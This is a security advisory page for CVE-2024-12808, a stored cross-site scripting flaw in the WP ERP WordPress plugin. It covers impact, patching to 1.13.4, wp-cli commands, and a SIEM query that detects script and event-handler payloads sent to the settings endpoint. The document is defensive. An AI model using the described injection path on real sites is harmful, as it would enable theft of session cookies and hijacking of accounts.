CVE-2024-12808
📋 TL;DR
This vulnerability in the WP ERP WordPress plugin allows high-privilege users (like administrators) to inject malicious scripts into plugin settings, which then execute when other users view those settings. It affects WordPress sites using WP ERP versions before 1.13.4, particularly in multisite configurations where unfiltered_html is restricted.
💻 Affected Systems
- WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting WordPress plugin
📦 What is this software?
Wp Erp by Wedevs
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin access could inject persistent malicious scripts that steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users.
Likely Case
Malicious admin or compromised admin account injects tracking scripts, defaces parts of the admin interface, or steals lower-privileged user credentials.
If Mitigated
Limited to admin-only exploitation with proper user access controls and monitoring; impact contained to plugin settings pages.
🎯 Exploit Status
Exploitation requires admin-level access. Attack involves injecting JavaScript into plugin settings fields that lack proper sanitization.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.13.4
Vendor Advisory: https://wpscan.com/vulnerability/f1f823f5-d0f1-45a5-85c2-60208d76366e/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'WP ERP' plugin. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 1.13.4+ from WordPress.org and manually update.
🔧 Temporary Workarounds
Remove Admin Access from Untrusted Users
allLimit admin privileges to only essential, trusted personnel to reduce attack surface.
Disable Plugin Temporarily
linuxIf plugin is not critical, disable it until patched to prevent exploitation.
wp plugin deactivate erp
🧯 If You Can't Patch
- Implement strict access controls and monitoring for admin accounts.
- Use web application firewall (WAF) rules to block XSS payloads in plugin settings.
🔍 How to Verify
Check if Vulnerable:
Check WP ERP plugin version in WordPress admin under Plugins > Installed Plugins. If version is below 1.13.4, you are vulnerable.Check Version:
wp plugin get erp --field=versionVerify Fix Applied:
After updating, confirm WP ERP plugin version is 1.13.4 or higher in the plugin list.📡 Detection & Monitoring
Log Indicators:
- Unusual admin activity modifying plugin settings
- JavaScript payloads in POST requests to wp-admin/admin.php?page=erp-settings
Network Indicators:
- Suspicious JavaScript in HTTP requests to plugin settings endpoints
SIEM Query:
source="wordpress.log" AND ("erp-settings" OR "wp-admin/admin.php") AND ("script" OR "javascript" OR "onload" OR "onerror")